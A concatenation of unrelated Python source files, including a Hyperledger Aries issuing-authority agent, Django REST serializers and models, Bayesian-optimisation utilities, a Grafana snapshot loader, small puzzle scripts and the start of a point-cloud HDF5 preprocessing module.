elif state == "presentation_acked":
print(colored("\nPresentation Exchange ID: {pei} is acknowledged by Relying Party".format(pei=pres_ex_id),
COLOR_SUCCESS, attrs=["bold"]))
class IssuingAuthority(AgentConnectionManager):
def __init__(self, agent_controller: AriesAgentController) -> None:
super(IssuingAuthority, self).__init__(agent_controller)
self.role = "Issuing Authority"
self.agent_listeners.append({"topic": "issue_credential", "handler": self._issuer_handler})
self.agent_controller.register_listeners(self.agent_listeners, defaults=False)
print(
colored("Successfully initiated AgentConnectionManager for a(n) {role} ACA-PY agent".format(role=self.role),
COLOR_SUCCESS, attrs=["bold"]))
def get_did(self) -> Optional[dict]:
"""
Verifies if an agent already has a public DID or not. If it does not, the function generates a new DID.
Returns: dictionary with DID information of the agent
"""
try:
# Verify if agent already has a public DID
loop = asyncio.get_event_loop()
public_did_response = loop.run_until_complete(
self.agent_controller.wallet.get_public_did()
)
# Either use the existing DID
if public_did_response["result"]:
did_obj = public_did_response["result"]
state = "found an existing"
# Or create a new DID
else:
loop = asyncio.get_event_loop()
create_did_response = loop.run_until_complete(
self.agent_controller.wallet.create_did()
# todo: this is where BSS NEEDS TO BE IMPLEMENTED (see https://github.com/hyperledger/aries-cloudagent-python/blob/main/demo/AliceWantsAJsonCredential.md)
# @todo: check out create_did here: https://github.com/OpenMined/PyDentity/blob/master/libs/aries-basic-controller/aries_basic_controller/controllers/wallet.py
# @todo and https://github.com/hyperledger/aries-cloudagent-python/blob/main/JsonLdCredentials.md
)
did_obj = create_did_response['result']
state = "created a new"
print(colored("Successfully {s} DID:".format(s=state), COLOR_SUCCESS, attrs=["bold"]))
pprint(create_did_response)
return did_obj
except Exception as e:
print(colored("Failed to get DID: ", COLOR_ERROR, attrs=["bold"]), e)
return None
def write_did_to_ledger(self, did_obj: dict, url: str = "http://dev.greenlight.bcovrin.vonx.io/register",
payload=None) -> None:
"""
Write DID to ledger (by default: Sovrin StagingNet)
Args:
did_obj: dictionary with DID information of agent
url: url to network
payload: payload with header information
Returns: -
"""
# Variables
if payload is None:
payload = {"seed": None, "did": did_obj["did"], "verkey": did_obj["verkey"]}
headers = {} # Empty header, because payload includes all information
# Send request
r = requests.post(url, data=json.dumps(payload), headers=headers)
response = r.json()
print(response)
def make_did_public(self, did_obj: dict) -> None:
"""
Assign agent with a public DID if it is not already set as public (can be the case if the containers were not properly shut down)
Args:
did_obj: dictionary with DID information of an agent
Returns: -
"""
if did_obj["posture"] != "public":
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.wallet.assign_public_did(did_obj["did"])
)
print(colored("Successfully initialized agent with Public DID: {d}".format(d=did_obj["did"]), COLOR_SUCCESS,
attrs=["bold"]))
else:
print("Agent already has Public DID: {d}".format(d=did_obj["did"]))
def accept_taa_agreement(self) -> None:
"""
Accept TAA agreement to be able to define schemes and issue VCs as an issuing authority
Returns: -
"""
print("--------------------------------- TRANSACTION AUTHOR AGREEMENT (TAA) ---------------------------------")
print(colored("Source: https://sovrin.org/preparing-for-the-sovrin-transaction-author-agreement/", COLOR_INFO))
print(colored("Accessed: Aug 16, 2021)", COLOR_INFO))
print("\n\"As a global public ledger, the Sovrin Ledger and all its participants are subject to privacy")
print("and data protection regulations such as the EU General Data Protection Regulation (GDPR).")
print("These regulations require that the participants be explicit about responsibilities for Personal Data.")
print("\nTo clarify these responsibilities and provide protection for all parties, the Sovrin Governance")
print("Framework Working Group developed an agreement between Transaction Authors and the Sovrin Foundation.")
print("The TAA can be found at Sovrin.org. It ensures that users are aware of and consent to the fact that")
print("all data written to the Sovrin Ledger cannot be removed, even if the original author of the transaction")
print("requests its removal.")
print("\nThe TAA outlines the policies that users must follow when interacting with the Sovrin Ledger.")
print("When a user's client software is preparing a transaction for submission to the network, it must include")
print("a demonstration that the user had the opportunity to review the current TAA and accept it. This is done")
print("by including some additional fields in the ledger write transaction:")
print("\t* A hash of the agreement")
print("\t* A date when the agreement was accepted, and")
print("\t* A string indicating the user interaction that was followed to obtain the acceptance.")
print("\nThe Indy client API used by Sovrin has been extended to allow users to review current and past")
print("agreements and to indicate acceptance through an approved user interaction pattern.\"")
print("------------------------------------------------------------------------------------------------------")
choice = get_choice("Do you accept the TAA?", "You cannot proceed until you accept the TAA.")
if choice is True:
try:
# Get TAA agreement
loop = asyncio.get_event_loop()
taa_response = loop.run_until_complete(
self.agent_controller.ledger.get_taa()
)
TAA = taa_response['result']['taa_record']
# Accept TAA
TAA['mechanism'] = "service_agreement"
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.ledger.accept_taa(TAA)
)
print(colored("Successfully signed TAA agreement", COLOR_SUCCESS, attrs=["bold"]))
except Exception as e:
print(colored("Failed to accept TAA agreement: ", COLOR_ERROR, attrs=["bold"]), e)
else:
print(
colored("Cannot define schemes nor issue VCs if the TAA is not accepted", COLOR_ERROR, attrs=["bold"]),
e)
def write_vc_schema(self, schema_name: str, schema_version: str, attributes: list) -> Optional[str]:
"""
Writes and defines schema that the issuing authority will be able to issue
Args:
schema_name: name of the schema
schema_version: version of the schema
attributes: list of attributes that are part of the schema
Returns: schema_id
"""
# Write schema and await response
try:
# Write schema to agent
loop = asyncio.get_event_loop()
response = loop.run_until_complete(
self.agent_controller.schema.write_schema(schema_name, attributes, schema_version)
)
# Process response
schema_id = response["schema_id"]
print(colored("Successfully wrote {n} schema:".format(n=schema_name), COLOR_SUCCESS, attrs=["bold"]))
pprint(response)
return schema_id
except Exception as e:
print(colored("Failed to write {n} schema: ".format(n=schema_name), COLOR_ERROR, attrs=["bold"]), e)
return None
def write_vc_cred_def(self, schema_id: str, tag: str = "default", support_revocation: bool = False) -> str:
"""
Writes credential definition transaction to the public ledger to speecify the public cryptographic
material the agent uses to sign all credentials issued against schema with schema_id
Args:
schema_id: id of schema
tag: tag of scheme
support_revocation: make credential definition support revokation. requires ACAPY_TAILS_SERVER_BASE_URL env
variable to be properly configured
Returns: credential definition id as string
"""
loop = asyncio.get_event_loop()
cred_def_response = loop.run_until_complete(
self.agent_controller.definitions.write_cred_def(schema_id, tag, support_revocation)
)
cred_def_id = cred_def_response["credential_definition_id"]
print(colored("Successfully wrote credential definition id: {cdef}".format(cdef=cred_def_id), COLOR_SUCCESS,
attrs=["bold"]))
return cred_def_id
def offer_vc(self, connection_id: str, schema_id: str, cred_def_id: str,
credential_attributes: Optional[list] = None, comment: Optional[str] = None,
auto_remove: bool = True, trace: bool = False) -> None:
"""
Gets schema ID and let's issuer fill out the attributes, to then offer a VC to the external
agent
Args:
connection_id: ID of the connection to whom a VC should be offered to
schema_id: ID of the scheme
cred_def_id: id that authorizes agent to issue a credential for that scheme
credential_attributes: list of {"name": <name>, "value": <value>} dicts with vc information
comment: comment
auto_remove: remove credential record after it has been issued
trace: trace ACA-PY instance
Returns: -
"""
# Get schema information from issuing authority by ID of schema
loop = asyncio.get_event_loop()
schema_info = loop.run_until_complete(
self.agent_controller.schema.get_by_id(schema_id)
)
# Prompt user to enter credential attributes if they were not passed as an argument
if credential_attributes is None:
# Get list of attributes required by schema
attributes = schema_info["schema"]["attrNames"]
# Loop data input until user is happy with the data
happy = False
while happy is False:
print(colored("Please enter the following information for the {n} scheme: ".format(
n=schema_info["schema"]['name']), COLOR_INPUT, attrs=["bold"]))
credential_attributes = []
for attr in attributes:
value = input(colored("{n}: ".format(n=attr), COLOR_INPUT))
credential_attributes.append({"name": attr, "value": value})
# Ask user if the data was entered correctly
happy = get_choice("Is the information correct?", "Please enter the information again.")
# Send credential to external agent at the other end of the connection_id if all data is collected
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.issuer.send_credential(connection_id, schema_id, cred_def_id, credential_attributes,
comment, auto_remove, trace)
)
def _issuer_handler(self, payload: TypeDict) -> None:
"""
Handles the payload for the Issuing Authority when issuing a verifiable credential
Args:
payload: dictionary with payload of incoming connection
Returns: -
"""
# Attributes
connection_id = payload['connection_id']
exchange_id = payload['credential_exchange_id']
state = payload['state']
role = payload['role']
# Print
print("\n---------------------------------------------------------------------")
print(colored("Handle Issue Credential Webhook: Issue Credential Handler", attrs=["bold"]))
print(f"Connection ID : {connection_id}")
print(f"Credential exchange ID : {exchange_id}")
print("Agent Protocol Role : ", role)
print("Protocol State : ", colored(state, COLOR_INFO))
print("---------------------------------------------------------------------")
# Handle different states
if state == "offer_sent":
offer = payload["credential_proposal_dict"]['credential_proposal']
print(colored("\nProposed Credential : ", attrs=["bold"]))
pprint(offer)
| StarcoderdataPython |
1623811 | <gh_stars>0
from rest_framework import serializers
from bestiary.models import Monster, Skill, LeaderSkill, SkillEffect, ScalingStat, Source, \
HomunculusSkillCraftCost, HomunculusSkill
from herders.models import MonsterTag, RuneInstance, TeamGroup, Team, MonsterInstance, Summoner, ArtifactInstance
# Read-only monster database stuff.
class MonsterSourceSerializer(serializers.ModelSerializer):
class Meta:
model = Source
exclude = ['meta_order', 'icon_filename']
class MonsterSkillEffectSerializer(serializers.ModelSerializer):
class Meta:
model = SkillEffect
fields = ('name', 'is_buff', 'description', 'icon_filename')
class MonsterSkillScalingStatSerializer(serializers.ModelSerializer):
class Meta:
model = ScalingStat
fields = ('stat',)
class MonsterSkillSerializer(serializers.HyperlinkedModelSerializer):
skill_effect = MonsterSkillEffectSerializer(many=True, read_only=True)
scales_with = MonsterSkillScalingStatSerializer(many=True, read_only=True)
class Meta:
model = Skill
fields = (
'pk', 'com2us_id', 'name', 'description', 'slot', 'cooltime', 'hits', 'passive', 'aoe', 'max_level', 'level_progress_description',
'skill_effect', 'multiplier_formula', 'multiplier_formula_raw', 'scales_with', 'icon_filename',
)
class MonsterLeaderSkillSerializer(serializers.ModelSerializer):
attribute = serializers.SerializerMethodField('get_stat')
area = serializers.SerializerMethodField()
element = serializers.SerializerMethodField()
class Meta:
model = LeaderSkill
fields = ('attribute', 'amount', 'area', 'element')
def get_stat(self, instance):
return instance.get_attribute_display()
def get_area(self, instance):
return instance.get_area_display()
def get_element(self, instance):
return instance.get_element_display()
class HomunculusSkillCraftCostSerializer(serializers.ModelSerializer):
name = serializers.ReadOnlyField(source='craft.name')
icon_filename = serializers.ReadOnlyField(source='craft.icon_filename')
class Meta:
model = HomunculusSkillCraftCost
fields = ['name', 'quantity', 'icon_filename']
class HomunculusSkillSerializer(serializers.ModelSerializer):
skill = MonsterSkillSerializer(read_only=True)
craft_materials = HomunculusSkillCraftCostSerializer(source='homunculusskillcraftcost_set', many=True)
class Meta:
model = HomunculusSkill
fields = ['skill', 'craft_materials', 'prerequisites']
# Small serializer for necessary info for awakens_from/to on main MonsterSerializer
class AwakensMonsterSerializer(serializers.HyperlinkedModelSerializer):
element = serializers.SerializerMethodField()
class Meta:
model = Monster
fields = ('url', 'pk', 'name', 'element')
def get_element(self, instance):
return instance.get_element_display()
class MonsterSerializer(serializers.HyperlinkedModelSerializer):
element = serializers.SerializerMethodField()
archetype = serializers.SerializerMethodField()
leader_skill = MonsterLeaderSkillSerializer(read_only=True)
awakens_from = AwakensMonsterSerializer(read_only=True)
awakens_to = AwakensMonsterSerializer(read_only=True)
source = MonsterSourceSerializer(many=True, read_only=True)
skills = MonsterSkillSerializer(many=True, read_only=True)
homunculus_skills = HomunculusSkillSerializer(many=True, source='homunculusskill_set')
class Meta:
model = Monster
fields = (
'url', 'pk', 'com2us_id', 'name', 'image_filename', 'element', 'archetype', 'base_stars', 'natural_stars',
'obtainable', 'can_awaken', 'is_awakened', 'awaken_bonus',
'skills', 'leader_skill', 'homunculus_skills',
'base_hp', 'base_attack', 'base_defense', 'speed', 'crit_rate', 'crit_damage', 'resistance', 'accuracy',
'max_lvl_hp', 'max_lvl_attack', 'max_lvl_defense',
'awakens_from', 'awakens_to',
'awaken_mats_fire_low', 'awaken_mats_fire_mid', 'awaken_mats_fire_high',
'awaken_mats_water_low', 'awaken_mats_water_mid', 'awaken_mats_water_high',
'awaken_mats_wind_low', 'awaken_mats_wind_mid', 'awaken_mats_wind_high',
'awaken_mats_light_low', 'awaken_mats_light_mid', 'awaken_mats_light_high',
'awaken_mats_dark_low', 'awaken_mats_dark_mid', 'awaken_mats_dark_high',
'awaken_mats_magic_low', 'awaken_mats_magic_mid', 'awaken_mats_magic_high',
'source', 'fusion_food', 'homunculus'
)
def get_element(self, instance):
return instance.get_element_display()
def get_archetype(self, instance):
return instance.get_archetype_display()
# Limited fields for displaying list view sort of display.
class MonsterSummarySerializer(serializers.HyperlinkedModelSerializer):
element = serializers.SerializerMethodField()
archetype = serializers.SerializerMethodField()
class Meta:
model = Monster
fields = ('url', 'pk', 'com2us_id', 'name', 'image_filename', 'element', 'archetype', 'base_stars', 'natural_stars', 'fusion_food',)
def get_element(self, instance):
return instance.get_element_display()
def get_archetype(self, instance):
return instance.get_archetype_display()
# Individual collection stuff
class MonsterTagSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = MonsterTag
fields = ('id', 'name')
class RuneInstanceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = RuneInstance
fields = (
'pk', 'type', 'get_type_display', 'assigned_to', 'efficiency', 'notes', 'marked_for_sale',
'stars', 'level', 'slot', 'quality', 'original_quality', 'value', 'get_quality_display', 'get_original_quality_display',
'main_stat', 'get_main_stat_rune_display', 'main_stat_value',
'innate_stat', 'get_innate_stat_rune_display', 'innate_stat_value',
'substats', 'substat_rune_display',
'substat_values', 'substats_enchanted', 'substats_grind_value',
'PERCENT_STATS',
)
class ArtifactInstanceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ArtifactInstance
fields = (
'pk', 'element', 'get_element_display', 'assigned_to', 'efficiency', 'max_efficiency',
'quality', 'get_quality_display', 'original_quality', 'get_original_quality_display',
'slot', 'get_slot_display', 'element', 'archetype',
'level', 'main_stat', 'get_main_stat_display', 'main_stat_value',
'get_effects_display', 'get_precise_slot_display'
)
class TeamGroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = TeamGroup
fields = [
'pk', 'name',
]
class TeamSerializer(serializers.HyperlinkedModelSerializer):
group = TeamGroupSerializer()
class Meta:
model = Team
fields = [
'pk', 'name', 'group'
]
class MonsterInstanceSummarySerializer(serializers.HyperlinkedModelSerializer):
monster = MonsterSummarySerializer(read_only=True)
class Meta:
model = MonsterInstance
fields = [
'url', 'pk', 'monster', 'stars', 'level',
]
class MonsterInstanceSerializer(serializers.ModelSerializer):
monster = MonsterSerializer(read_only=True)
team_leader = TeamSerializer(many=True)
team_set = TeamSerializer(many=True)
runeinstance_set = RuneInstanceSerializer(many=True)
artifactinstance_set = ArtifactInstanceSerializer(many=True)
tags = MonsterTagSerializer(many=True)
class Meta:
model = MonsterInstance
fields = (
'pk', 'monster', 'stars', 'level',
'skill_1_level', 'skill_2_level', 'skill_3_level', 'skill_4_level',
'fodder', 'in_storage', 'ignore_for_fusion', 'priority', 'notes',
'base_hp', 'base_attack', 'base_defense', 'base_speed', 'base_crit_rate', 'base_crit_damage', 'base_resistance', 'base_accuracy',
'rune_hp', 'rune_attack', 'rune_defense', 'rune_speed', 'rune_crit_rate', 'rune_crit_damage', 'rune_resistance', 'rune_accuracy',
'artifact_hp', 'artifact_attack', 'artifact_defense',
'hp', 'attack', 'defense', 'speed', 'crit_rate', 'crit_damage', 'resistance', 'accuracy',
'team_leader', 'team_set', 'runeinstance_set', 'artifactinstance_set', 'tags'
)
depth = 1
class SummonerSummarySerializer(serializers.ModelSerializer):
class Meta:
model = Summoner
fields = ('summoner_name',)
class SummonerSerializer(serializers.ModelSerializer):
monsterinstance_set = MonsterInstanceSummarySerializer(many=True, read_only=True)
class Meta:
model = Summoner
fields = ('summoner_name', 'monsterinstance_set', 'server')
| StarcoderdataPython |
1788969 | amount = int(input())
sen = [0 for n in range(amount)]
for i in range(amount):
sen[i] = list(input())
cap = False
for z in range(len(sen[i])):
if sen[i][z].isalpha() == True:
if cap == True:
cap = False
sen[i][z] = sen[i][z].upper()
else:
sen[i][z] = sen[i][z].lower()
cap = True
for x in range(amount):
print("".join(sen[x])) | StarcoderdataPython |
1798648 | <reponame>henrikstranneheim/chanjo-report
# -*- coding: utf-8 -*-
"""
test_chanjo_report
----------------------------------
Tests for `chanjo-report` module.
"""
import pytest
import chanjo_report
class TestChanjoReport(object):
@classmethod
def set_up(self):
pass
def test_something(self):
pass
@classmethod
def tear_down(self):
pass
| StarcoderdataPython |
3295052 | <filename>bayes_optim/utils/utils.py
import functools
import os
import random
import re
import string
import time
from copy import copy
from typing import Callable, Dict, List, Union
import numpy as np
from ..solution import Solution
from .exception import ConstraintEvaluationError
def is_pareto_efficient(fitness, return_mask: bool = True) -> Union[List[int], List[bool]]:
"""get the Pareto efficient subset
Parameters
----------
fitness : np.ndarray of shape (n_points, n_obj)
the objective value
return_mask : bool, optional
if returning a mask, by default True
Returns
-------
An array of indices of pareto-efficient points.
If return_mask is True, this will be an (n_points, ) boolean array
Otherwise it will be a (n_efficient_points, ) integer array of indices.
"""
is_efficient = np.arange(fitness.shape[0])
n_points = fitness.shape[0]
next_point_index = 0 # Next index in the is_efficient array to search for
while next_point_index < len(fitness):
nondominated_point_mask = np.any(fitness < fitness[next_point_index], axis=1)
nondominated_point_mask[next_point_index] = True
is_efficient = is_efficient[nondominated_point_mask] # Remove dominated points
fitness = fitness[nondominated_point_mask]
next_point_index = np.sum(nondominated_point_mask[:next_point_index]) + 1
if return_mask:
is_efficient_mask = np.zeros(n_points, dtype=bool)
is_efficient_mask[is_efficient] = True
return is_efficient_mask
return is_efficient
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def safe_divide(x1, x2):
"""Divide x1 / x2, return 0 where x2 == 0"""
return np.divide(x1, x2, out=np.zeros(np.broadcast(x1, x2).shape), where=(x2 != 0))
def random_string(k: int = 15):
return "".join(random.choices(string.ascii_letters + string.digits, k=k))
def expand_replace(s: str):
m = re.match(r"${.*}", s)
for _ in m.group():
s.replace(_, os.path.expandvars(_))
return s
# TODO: implement this as a C procedure
def proportional_selection(perf, N, minimize=True, replacement=True):
def select(perf):
perf_min = np.min(perf)
interval = np.cumsum((perf - perf_min) / (np.sum(perf) - perf_min * len(perf)))
return np.nonzero(np.random.rand() <= interval)[0][0]
perf = np.array(perf)
if minimize:
perf = -perf
perf -= np.min(perf)
if replacement:
res = [select(perf) for i in range(N)]
else:
assert N <= len(perf)
perf_ = copy(perf)
idx = list(range(0, len(perf)))
res = []
for i in range(N):
if len(perf_) == 1:
res.append(idx[0])
else:
_ = select(perf_)
res.append(idx[_])
perf_ = np.delete(perf_, _)
del idx[_]
return res
# TODO: double check this one. It causes the explosion of step-sizes in MIES
def handle_box_constraint(x, lb, ub):
"""This function transforms x to t w.r.t. the low and high
boundaries lb and ub. It implements the function T^{r}_{[a,b]} as
described in Rui Li's PhD thesis "Mixed-Integer Evolution Strategies
for Parameter Optimization and Their Applications to Medical Image
Analysis" as alorithm 6.
"""
x = np.asarray(x, dtype="float")
shape_ori = x.shape
x = np.atleast_2d(x)
lb = np.atleast_1d(lb)
ub = np.atleast_1d(ub)
transpose = False
if x.shape[0] != len(lb):
x = x.T
transpose = True
lb, ub = lb.flatten(), ub.flatten()
lb_index = np.isfinite(lb)
up_index = np.isfinite(ub)
valid = np.bitwise_and(lb_index, up_index)
LB = lb[valid][:, np.newaxis]
UB = ub[valid][:, np.newaxis]
y = (x[valid, :] - LB) / (UB - LB)
I = np.mod(np.floor(y), 2) == 0
yprime = np.zeros(y.shape)
yprime[I] = np.abs(y[I] - np.floor(y[I]))
yprime[~I] = 1.0 - np.abs(y[~I] - np.floor(y[~I]))
x[valid, :] = LB + (UB - LB) * yprime
if transpose:
x = x.T
return x.reshape(shape_ori)
def fillin_fixed_value(X: List[List], fixed: Dict, search_space):
if fixed is None:
return X
if len(X) == 0:
return X
mask = np.array([v in fixed.keys() for v in search_space.var_name])
values = [fixed[k] for i, k in enumerate(search_space.var_name) if mask[i]]
out = np.empty((len(X), len(mask)), dtype=object)
out[:, ~mask] = X
for i in range(len(X)):
out[i, mask] = values
return out.tolist()
def partial_argument(
func: callable,
var_name: List[str],
fixed: Dict[str, Union[str, float, int, object, bool]] = None,
reduce_output: bool = False,
):
"""fill-in the values for inactive variables
Parameters
----------
func : callable
the target function to call which is defined on the original search space
masks : np.ndarray
the mask array indicating which variables are deemed inactive
values : np.ndarray
the values fixed for the inactive variables
"""
fixed = {} if fixed is None else fixed
masks = np.array([v in fixed.keys() for v in var_name])
values = [fixed[k] for i, k in enumerate(var_name) if masks[i]]
@functools.wraps(func)
def wrapper(X: Union[np.ndarray, Solution, list]):
if not isinstance(X, np.ndarray):
X = np.array(X, dtype=object)
N = 1 if len(X.shape) == 1 else X.shape[1]
X_ = np.empty((N, len(masks)), dtype=object)
X_[:, ~masks] = X
# this is needed if `values` contains tuples
for i in range(N):
X_[i, masks] = values
out_ = func(X_)
# TODO: fix this ad-hoc solution for acquisition functions
if reduce_output:
out = []
for v in tuple(out_):
if isinstance(v, np.ndarray):
if len(v.shape) == 1 and len(v) > 1:
v = v[~masks]
elif len(v.shape) == 2:
if v.shape[0] == len(masks):
v = v[~masks, :]
elif v.shape[1] == len(masks):
v = v[:, ~masks]
elif isinstance(v, list) and len(v) == len(masks):
v = [v[m] for m in ~masks]
out.append(v)
return tuple(out)
return out_
return wrapper
def func_with_list_arg(func, arg_type, var_names):
@functools.wraps(func)
def wrapper(X):
if isinstance(X, (list, tuple)):
X = np.array(X, dtype="object")
if len(X.shape) == 1:
X = X[np.newaxis, :]
X = Solution(X, var_name=var_names)
if arg_type == "list":
X = X.tolist()
elif arg_type == "dict":
X = X.to_dict()
return np.array([func(_) for _ in X]).ravel()
return wrapper
def timeit(func):
@functools.wraps(func)
def __func__(ref, *arg, **kwargv):
t0 = time.time()
out = func(ref, *arg, **kwargv)
if hasattr(ref, "logger"):
ref.logger.info(f"{func.__name__} takes {time.time() - t0:.4f}s")
else:
print(f"{func.__name__} takes {time.time() - t0:.4f}s")
return out
return __func__
def arg_to_int(arg):
if isinstance(arg, str):
x = int(eval(arg))
elif isinstance(arg, (int, float)):
x = int(arg)
else:
raise ValueError
return x
def set_bounds(bound, dim):
if isinstance(bound, str):
bound = eval(bound)
elif isinstance(bound, (float, int)):
bound = [bound] * dim
elif hasattr(bound, "__iter__"):
bound = list(bound)
if len(bound) == 1:
bound *= dim
assert len(bound) == dim
return np.asarray(bound)
def dynamic_penalty(
X: List,
t: int = 1,
equality: Callable = None,
inequality: Callable = None,
C: float = 0.5,
alpha: float = 1,
beta: float = 1.5,
epsilon: float = 1e-1,
minimize: bool = True,
) -> np.ndarray:
r"""Dynamic Penalty calculated as follows:
$$(tC)^{\alpha} * [\sum_i max(|h(x_i)|, \epsilon) + \sum_i max(0, g(x_i))^{\beta}],$$
where $x_i$ -> each row of ``X``, h -> ``equality``, and g -> ``inequality``.
TODO: give a reference here
Parameters
----------
X : np.ndarray
Input candidate solutions
t : int, optional
The iteration number of the optimization algorithm employing this method, by default 1
equality : Callable, optional
Equality function, by default None
inequality : Callable, optional
Inequality function, by default None
C : float, optional
coefficient of the iteration term, by default 0.5
alpha : float, optional
exponent to the iteration term, by default 1
beta : float, optional
coefficient to the inequality terms, by default 2
epsilon : float, optional
threshold to determine whether the equality constraint is met, by default 1e-4
minimize : bool, optional
minimize or maximize? by default True
Returns
-------
``p``
the dynamic penalty value
"""
if not hasattr(X[0], "__iter__") or isinstance(X[0], str):
X = [X]
X = np.array(X, dtype=object)
N = len(X)
p = np.zeros(N)
if equality is not None:
try:
v = np.atleast_2d(list(map(equality, X))).reshape(N, -1)
except Exception as e:
raise ConstraintEvaluationError(X, str(e)) from None
v[np.abs(v) <= epsilon] = 0
p += np.sum(np.abs(v), axis=1)
if inequality is not None:
try:
v = np.atleast_2d(list(map(inequality, X))).reshape(N, -1)
except Exception as e:
raise ConstraintEvaluationError(X, str(e)) from None
# NOTE: inequalities are always tested with less or equal relation.
# Inequalities with strict less conditions should be created by adding a tiny epsilon
# to the constraint
v[v <= 0] = 0
p += np.sum(np.abs(v) ** beta, axis=1)
p = (C * t) ** alpha * p * (-1) ** (not minimize)
return p
| StarcoderdataPython |
12355 | import json
from grafana_backup.dashboardApi import create_snapshot
def main(args, settings, file_path):
grafana_url = settings.get('GRAFANA_URL')
http_post_headers = settings.get('HTTP_POST_HEADERS')
verify_ssl = settings.get('VERIFY_SSL')
client_cert = settings.get('CLIENT_CERT')
debug = settings.get('DEBUG')
with open(file_path, 'r') as f:
data = f.read()
snapshot = json.loads(data)
try:
snapshot['name'] = snapshot['dashboard']['title']
except KeyError:
snapshot['name'] = "Untitled Snapshot"
(status, content) = create_snapshot(json.dumps(snapshot), grafana_url, http_post_headers, verify_ssl, client_cert, debug)
if status == 200:
print("create snapshot: {0}, status: {1}, msg: {2}".format(snapshot['name'], status, content))
else:
print("creating snapshot {0} failed with status {1}".format(snapshot['name'], status))
| StarcoderdataPython |
1602787 | from collections import Counter
with open('./input_4.txt') as fp:
num, add = 0, 0
for line in fp:
num += Counter(line.split()).most_common(1)[0][1] == 1
add += Counter(''.join(sorted(w)) for w in line.split()).most_common(1)[0][1] == 1
print(num, add)
| StarcoderdataPython |
34209 | <filename>Chapter05/restful_python_2_05/Django01/games_service/games/models.py
from django.db import models
class Game(models.Model):
created_timestamp = models.DateTimeField(auto_now_add=True)
name = models.CharField(max_length=200)
release_date = models.DateTimeField()
esrb_rating = models.CharField(max_length=150)
played_once = models.BooleanField(default=False)
played_times = models.IntegerField(default=0)
class Meta:
ordering = ('name',)
| StarcoderdataPython |
106776 | #xyz Sep 2017
'''
Data preparation for datsets: stanford_indoor, scannet, ETH_semantic3D
Core idea: store all the information in hdf5 file itself
# The workflow to use this tool:
Raw_H5f -> Sorted_H5f -> merge block to get new block size -> randomnly select n points
-> Normed_H5f -> Net_Provider
## Raw_H5f store the raw data of dataset, which contains several datasets: xyz, label, color.... Each dataset
stores the whole data for one dtype data.
(.rh5)
## Sorted_H5f contains lots of lots of dataset. Each dataset stores all types of data within a spacial block.
The point number of each block/dataset can be fix or not.
(.sh5) Use class Sort_RawH5f to generate sorted file with unfixed point num in each block, and a small stride / step size.
Then merge .sh5 file with small stride/step size to get larger size block.
(.rsh5) Randomly sampling .sh5 file to get Sorted_H5f file with fixed point number in each block.
## Normed_H5f includes 4 datasets: data, label, raw_xyz, pred_logit
(.sph5) This file is directly used to feed data for deep learning models.
.sph5 file is generated by Sorted_H5f.file_normalize_to_NormedH5F()
## For all three files, show_h5f_summary_info() can use to show the info summary.
## scannet_block_sample.py is the basic usage for these classes.
'''
from __future__ import print_function
import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(ROOT_DIR,'utils'))
#from plyfile import (PlyData, PlyElement, make2d, PlyParseError, PlyProperty)
import math
import numpy as np
import h5py
import glob
import time
import multiprocessing as mp
import itertools
import ply_util
#from global_para import GLOBAL_PARA
sys.path.append(BASE_DIR+'/MATTERPORT_util')
sys.path.append(BASE_DIR+'/KITTI_util')
from MATTERPORT_util import get_cat40_from_rawcat
sys.path.append(BASE_DIR+'/all_datasets_meta')
from datasets_meta import DatasetsMeta
import csv,pickle
from configs import get_gsbb_config, NETCONFIG
import magic
''' Def key words list
Search with "name:" to find the definition.
rootb_split_idxmap
bxmh5
flatten_bidxmap
sg_bidxmap
baseb_exact_flat_num
global_step
'''
''' Important functions
get_blockids_of_dif_stride_step
get_bidxmap
get_all_bidxmaps
gsbb naming: get_pyramid_flag
file_saveas_pyramid_feed
'''
''' step, stride Configuration
(1) set_whole_scene_stride_step: limit stride, step of every cascade by whole scene scope. By calling update_align_scope_by_stridetoalign_
(2) IsLimitStrideStepCascades_Inbxmap : Always limit step and stride larger than last cascade in bxmh5
'''
SHOW_ONLY_ERR = False
DEBUGTMP = False
ENABLECHECK = False
START_T = time.time()
g_h5_num_row_1M = 5*1000
ROOT_DIR = os.path.dirname(BASE_DIR)
UPER_DIR = os.path.dirname(ROOT_DIR)
DATA_DIR = os.path.join(ROOT_DIR,'data')
DATA_SOURCE_NAME_LIST = ['ETH','STANFORD_INDOOR3D','SCANNET','MATTERPORT','KITTI', 'MODELNET40']
FLOAT_BIAS = 1e-8
def isin_sorted( a,v ):
i = np.searchsorted(a,v)
if i>=a.size: return False
r = a[i] == v
return r
def get_stride_step_name(block_stride,block_step):
if not block_step[0] == block_step[1]:
import pdb; pdb.set_trace() # XXX BREAKPOINT
pass
assert block_stride[0] == block_stride[1]
#assert (block_step[0] == block_step[2] and block_stride[0] == block_stride[2]) or (block_step[2]<0 and block_stride[2]<0)
def get_str(v):
return str(v).replace('.','d')
#assert (v*100) % 1 < 1e-8, "v=%s"%(str(v))
#if v%1!=0:
# if (v*10)%1 < 1e-8: return '%dd%d'%(v,v%1*10)
# else: return '%dd%d%d'%(v,v%1*10, v*10%1*10)
#else: return str(int(v))
if block_stride[2] == -1:
return 'stride-%s-step-%s'%(get_str(block_stride[0]),get_str(block_step[0]))
else:
return 'stride_%s_step_%s'%(get_str(block_stride[0]),get_str(block_step[0]))
def rm_file_name_midpart(fn,rm_part):
base_name = os.path.basename(fn)
parts = base_name.split(rm_part)
if len(parts)>1:
new_bn = parts[0] + parts[1]
else:
new_bn = parts[0]
new_fn = os.path.join(os.path.dirname(fn),new_bn)
return new_fn
def copy_h5f_attrs(h5f_attrs):
attrs = {}
for e in h5f_attrs:
attrs[e] = h5f_attrs[e]
return attrs
def get_mean_sg_sample_rate(sum_sg_bidxmap_sample_num):
